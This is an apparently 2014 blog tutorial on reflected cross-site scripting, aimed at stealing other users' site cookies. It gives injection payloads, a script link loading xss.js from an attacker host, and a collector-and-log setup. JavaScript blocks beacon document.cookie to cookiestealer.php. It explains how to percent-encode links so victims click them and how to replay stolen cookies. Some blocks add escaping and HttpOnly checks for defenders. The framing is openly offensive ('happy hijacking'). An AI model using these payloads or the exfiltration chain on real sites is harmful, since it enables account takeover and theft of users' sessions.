
Sunday, 10 August 2014

Cross site scripting - XSS tutorial Detailed


So what is an XSS attack? Cross-site scripting is the art of running scripts in your victim's browser: with the right knowledge you can run almost any script there, and the thing XSS is most often used for is stealing cookies.

Cookies are bits of information that web servers / web sites use to check who you are on that site. If you are a guest, the site sets a cookie saying you are a guest; when you log in it replaces that cookie with one tied to the account you logged in with, which will hold your login ID and, on some forums, an MD5 hash of your password (a hash, not encryption, but if the forum compares that hash directly it can be replayed as-is). The site can add whatever else it thinks of to make sure you are who you say you are, such as session IDs that expire after a time limit the server sets, like 10 or 60 minutes.

Inside the cookie the fields are named, so when the server checks who you are it reads pieces of data such as the ID and the MD5 hash. Most forums keep their default cookie prefix, like nukeevo_ID and so on, but the forum admin can change that.

What is a user ID? If you are the first to sign up to a forum your ID will be ONE, because you will be the first row in the SQL table (I will talk about the SQL tables later). The admin account is nearly always ID 1 or 2, because of course the admin had to create the account first to configure the forum.

Now, when looking for this type of attack, first take the hacker's point of view: the goal is to get that script to run no matter what, trying every way he or she can find. On MySpace this was done with Flash files, not to steal cookies (MySpace filters JavaScript) but to redirect the victim to a fake login page; the files for this can be found in downloads. That used .swf files, but the newest one for MySpace uses .mov files, QuickTime files that carry a URL pointing at your fake login. A good FREE server that will run PHP files is www.php1h.com; you would upload your cookie-stealing scripts to that server so the victim's cookie gets sent there and you can view it in the log.

OK, here is how you could set it up:

http://evilhacker.php1h.com/cookiestealer.php = this is the backbone; it receives the cookie from the JavaScript we run, called xss.js, and writes it to the log

http://evilhacker.php1h.com/log.php    = this is the log where the cookie ends up after cookiestealer.php has written it

www.evilhacker.php1h.com/xss.js     = this is the JavaScript that reads the cookie in the victim's browser and hands it to cookiestealer.php


: finding XSS attacks :

The first way is to browse the site looking for any input boxes, then view the source of that page to get the name of the input box. When looking for an XSS, look at the URL in the address bar; you will see things like

www.site.com/blah.html or .php or .cfm or .jsp ..

Make sure you have the full URL. If there is already something after the ? mark, add your parameter at the end with a &, like this:

www.site.com/page.php?MID=2&(NAME_OF_INPUT_BOX)=(script)

So if the input box was called milk (for some reason, I don't know why, but just for this tutorial let's say that) and the script just prints the word Xss on screen:

www.site.com/page.php?MID=2&MILK="><script>alert("Xss")</script>

The "> is there because the " closes the attribute value the page echoes us into and the > closes the tag, so the browser stops reading the input box there and runs the JavaScript that follows. (Parameter names are case-sensitive on most servers, so use exactly the name you saw in the source.) If the input box was called cat it would look like this:

www.site.com/page.php?MID=2&cat="><script>alert("Xss")</script>

So go round a site looking for any type of input box. Sometimes I find that if a site has a "send to a friend" feature, that email box works.

After you have found one, i.e. you get a pop-up with the word Xss in it, view the source and look for the word Xss inside an input box. The basic syntax of what you will see is

<input type="hidden" name="milk" value="" />

From there you build the URL, which I will talk about at the end.
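To make the "> trick concrete, here is an added example (my code, not anything from the original post): a stand-in for the page.php that echoes the milk parameter into that hidden input, written the vulnerable way and the escaped way, plus the check a tester makes on the returned source. The template, the query-parsing helper, the sample links and the lowercase parameter name milk (the post uses MILK in the URL and milk in the HTML) are my assumptions.

```javascript
// Added example, not code from the original post. Models the reflection:
// page.php echoes the "milk" query parameter into <input ... value="...">.

// What the server sees: query parameters arrive percent-decoded.
function queryParam(link, name) {
  return new URL(link).searchParams.get(name);
}

// Vulnerable page.php: the raw value is dropped straight into the attribute,
// so a value beginning with "> ends the attribute and the tag.
function renderHiddenInputVulnerable(name, value) {
  return `<input type="hidden" name="${name}" value="${value}" />`;
}

// Hardened page.php: attribute-encode the value before concatenating.
function escapeHtmlAttr(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

function renderHiddenInputSafe(name, value) {
  return `<input type="hidden" name="${name}" value="${escapeHtmlAttr(value)}" />`;
}

// Tester's check on the returned source: did the marker leave the attribute
// and become a real <script> tag?
function payloadBrokeOut(html) {
  return /<script[\s>]/i.test(html);
}

// Constructed links (assumed host): the post's plain link, and the same
// payload percent-encoded. Both decode to the same parameter value.
const PLAIN_LINK =
  'http://www.site.com/page.php?MID=2&milk="><script>alert("Xss")</script>';
const ENCODED_LINK =
  "http://www.site.com/page.php?MID=2&milk=%22%3E%3Cscript%3Ealert(%22Xss%22)%3C%2Fscript%3E";

// Run the whole chain for one link: parse, render both ways, report.
function probe(link) {
  const value = queryParam(link, "milk");
  const vulnerable = renderHiddenInputVulnerable("milk", value);
  const safe = renderHiddenInputSafe("milk", value);
  return {
    value,
    vulnerable,
    safe,
    vulnerableBrokeOut: payloadBrokeOut(vulnerable),
    safeBrokeOut: payloadBrokeOut(safe),
  };
}

for (const link of [PLAIN_LINK, ENCODED_LINK]) {
  const r = probe(link);
  console.log(r.vulnerable); // value=""><script>alert("Xss")</script>" />
  console.log(r.safe);       // value="&quot;&gt;&lt;script&gt;..." stays text
  console.log("broke out:", r.vulnerableBrokeOut, "escaped:", r.safeBrokeOut);
}
```

The escaped version is the fix the site owner wants: once " becomes &quot; the browser never leaves the attribute, so the same link only puts harmless text into the hidden field.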
So after finding an XSS that you are able to run in your browser, you want to start running the cookie-grabbing script. The link will look like this:

www.site.com/page.php?MID=2&MILK="><script src="http://evilhacker.php1h.com/xss.js"></script>

If you sent someone that link in an email or on MSN it would run in their browser, executing that JavaScript to steal their cookies for site.com. Note that it does not matter that xss.js is loaded from evilhacker.php1h.com: a script runs with the rights of the page that included it, and that page belongs to site.com, so document.cookie gives it site.com's cookies. So if you found an XSS in msn.com you would get their cookies for msn.com.
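What xss.js actually has to do, and what stops it, as an added example (mine, not the post's xss.js or cookiestealer.php): part 1 is the smallest useful payload, reading document.cookie and shipping it to the collector as a GET parameter by pointing an Image at it, so the victim sees no navigation; part 2 is the defender's check, because a cookie set with the HttpOnly attribute never appears in document.cookie and this chain captures nothing from it. Assumed by me: the collector reads the cookie from a parameter called c (the post never names one), and the Set-Cookie headers and cookie names below are constructed, modelled on the nukeevo_ prefix the post mentions.

```javascript
// Added example, not the post's scripts. Collector host is the one the post
// names; the "c" parameter and the sample data are my assumptions.
const COLLECTOR = "http://evilhacker.php1h.com/cookiestealer.php";

function buildExfilUrl(cookieString, collector = COLLECTOR) {
  return collector + "?c=" + encodeURIComponent(cookieString);
}

// Body of xss.js. `doc` and `ImageCtor` are injected so the same function
// runs in a browser (document, Image) and here under Node with fakes.
function xssPayload(doc, ImageCtor) {
  const beacon = new ImageCtor();
  beacon.src = buildExfilUrl(doc.cookie); // setting src fires the GET
  return beacon.src;
}

// Defender side: from the Set-Cookie headers a site returns, list the cookie
// names that script can read (no HttpOnly attribute). Those are exactly the
// ones a stolen document.cookie would contain.
function cookiesReadableByScript(setCookieHeaders) {
  const exposed = [];
  for (const header of setCookieHeaders) {
    const parts = header.split(";").map((p) => p.trim());
    const name = parts[0].split("=")[0];
    const attrs = parts.slice(1).map((p) => p.toLowerCase());
    if (!attrs.includes("httponly")) exposed.push(name);
  }
  return exposed;
}

// Constructed sample data (not captured from any real site).
const SAMPLE_SET_COOKIE = [
  "nukeevo_ID=2; path=/",
  "nukeevo_pass=5f4dcc3b5aa765d61d8327deb882cf99; path=/", // md5("password")
  "PHPSESSID=abc123; path=/; HttpOnly",
];

// What document.cookie would show for the headers above: only the first two,
// because PHPSESSID is HttpOnly.
const FAKE_DOCUMENT = {
  cookie: "nukeevo_ID=2; nukeevo_pass=5f4dcc3b5aa765d61d8327deb882cf99",
};
class FakeImage {}

const sent = xssPayload(FAKE_DOCUMENT, FakeImage);
console.log("exfil request:", sent);
console.log("cookies an XSS can read:", cookiesReadableByScript(SAMPLE_SET_COOKIE));
console.log("collector recovers:", new URL(sent).searchParams.get("c"));
```

HttpOnly only protects the cookie value: the injected script still runs inside the victim's logged-in page and can make requests as them, so it limits theft, not the XSS itself.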

But you might ask yourself, how do I swap in the stolen cookies? If you are using Firefox there is an add-on called Cookie Editor that lets you edit your cookies. In IE you can probably edit them under Temporary Internet Files or similar, but your best bet is FF (Firefox). Just remember that what you steal is not one opaque blob; it is a set of named values like UID and others, and which ones the site actually checks you will have to work out for yourself.

Sending the link to a victim can be hard work. If someone sent me a link that looked like this:

www.site.com/page.php?MID=2&MILK="><script src="http://evilhacker.php1h.com/xss.js"></script>

I wouldn't click it. But :P if you encode some of the characters in that URL as hex (this is URL percent-encoding, not encryption) using an ASCII table like this one:

http://62.31.49.95/asciifull.gif

you could make it look something like this:

%22%3E%3Cscript src=%22http://evilhacker.php1h.com/xss.js%22%3E%3C/script%3E   = the script with the quotes and angle brackets hex-encoded; the server decodes it before the page echoes it, so it runs exactly the same

Would you click that instead? To send it through MSN you might want to add another & at the end and fill it with junk, like

www.site.com/page.php?MID=2&MILK=%22%3E%3Cscript src=%22http://evilhacker.php1h.com/xss.js%22%3E%3C/script%3E&mk=12

That makes the messenger treat the whole thing as one link to include. There are other ways, like using .gif images to run the script on the site, but that's another story.
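The hex step done by hand, as an added example (mine rather than the post's): each byte becomes %XX from the ASCII table, which is plain URL percent-encoding, and the server decodes it before page.php echoes the value, so the obfuscated and plain links deliver the identical script. The set of characters encoded in the partial form is my choice, picked to reproduce the post's example; the full form encodes everything a browser would not send raw.

```javascript
// Added example, not from the post. ASCII-only, matching the ASCII table
// the post points at.
const PAYLOAD = '"><script src="http://evilhacker.php1h.com/xss.js"></script>';

function hexByte(b) {
  return "%" + b.toString(16).toUpperCase().padStart(2, "0");
}

// Encode only the characters listed in `chars`; everything else stays readable,
// which is what the post does to keep the link looking harmless.
function percentEncodeChars(s, chars) {
  let out = "";
  for (const ch of s) out += chars.includes(ch) ? hexByte(ch.charCodeAt(0)) : ch;
  return out;
}

// Encode every byte except RFC 3986 unreserved characters (letters, digits,
// - . _ ~), i.e. what a browser does when it submits the query itself.
function percentEncodeAll(s) {
  let out = "";
  for (const b of Buffer.from(s, "utf8")) {
    const c = String.fromCharCode(b);
    out += /[A-Za-z0-9\-._~]/.test(c) ? c : hexByte(b);
  }
  return out;
}

// What reaches page.php after the server's decode step.
function serverSees(encoded) {
  return decodeURIComponent(encoded);
}

const partial = percentEncodeChars(PAYLOAD, '"<>');
const full = percentEncodeAll(PAYLOAD);
console.log(partial);
console.log(full);
console.log("both decode to the payload:", serverSees(partial) === PAYLOAD, serverSees(full) === PAYLOAD);
```

Because the decode happens before the value is echoed, encoding never gets a payload past a filter that runs after decoding; it only changes what a human sees in the link.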

Well, that's it for now. Hope you enjoyed the read.



happy hijacking 
Item Reviewed: Cross site scripting - XSS tutorial Detailed. Reviewed By: AJAY DEVGAN